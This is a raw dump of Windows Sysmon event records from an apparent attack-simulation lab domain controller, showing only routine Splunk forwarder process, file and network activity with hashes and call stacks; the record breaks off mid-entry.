10341000x80000000000000009016Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:06.435{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6536-6064-2001-00000000AE01}4448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009015Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:06.435{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009014Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:06.435{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009013Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:06.435{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009012Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:06.435{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6536-6064-2001-00000000AE01}4448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009011Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:06.435{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009010Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:06.435{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6536-6064-2001-00000000AE01}4448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009009Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:06.435{266CAFBE-6536-6064-2001-00000000AE01}4448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009037Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:07.917{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6537-6064-2201-00000000AE01}7000C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009036Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:07.917{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009035Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:07.917{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009034Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:07.917{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009033Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:07.917{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009032Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:07.917{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6537-6064-2201-00000000AE01}7000C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009031Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:07.917{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6537-6064-2201-00000000AE01}7000C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009030Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:07.918{266CAFBE-6537-6064-2201-00000000AE01}7000C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000009029Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:07.730{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32BB9451C81D45831616D5DDBBAF276F,SHA256=B8701247396672D0791F3FB81C3F28263ADE766BA79DE2E0BAD25EB9EF364464,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009028Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:06.479{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53621-false10.0.1.12-8000- 10341000x80000000000000009027Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:07.246{266CAFBE-6537-6064-2101-00000000AE01}67286368C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009026Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:07.090{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6537-6064-2101-00000000AE01}6728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009025Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:07.090{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009024Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:07.090{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009023Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:07.090{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009022Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:07.090{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009021Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:07.090{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6537-6064-2101-00000000AE01}6728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009020Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:07.090{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6537-6064-2101-00000000AE01}6728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009019Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:07.091{266CAFBE-6537-6064-2101-00000000AE01}6728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000009039Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:08.744{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=137D4EE03D9D2C0477D5C5E11820DD5A,SHA256=DEC60D9E4C23CB751E88ABB26C4FFA52BB29959EE14F1ECA419810C049F08E6A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009038Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:08.073{266CAFBE-6537-6064-2201-00000000AE01}70006904C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000009048Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:09.774{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=054B95208ADCC9A54CA886DFADAE2F19,SHA256=D306D3F1088138FFA161FDEC54B0B14BE7B33D8C27D1A3B4E5676912774DC3C6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009047Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:09.540{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6539-6064-2301-00000000AE01}6644C:\Program 